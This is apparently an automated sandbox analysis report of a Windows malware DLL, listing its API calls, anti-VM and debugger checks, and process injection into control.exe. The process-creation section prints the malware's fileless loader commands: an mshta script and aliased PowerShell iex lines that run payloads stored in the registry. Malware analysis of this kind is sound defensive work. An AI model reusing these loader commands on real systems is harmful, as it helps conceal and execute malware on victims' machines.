            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4780
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1593
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5638
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3533
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5347
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3944
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5671
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3636
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
            Source: mshta.exe, 00000021.00000003.374607061.00000121EDD21000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
            Source: control.exe, 00000030.00000002.420216266.000002031134E000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B039B2 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0A64 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960A64 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0A64 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B02ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E2ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05912ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00992ABE StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6912712E0
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6912712E0
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6912712E0
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6912712E0
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3352
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 8DCB1580
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
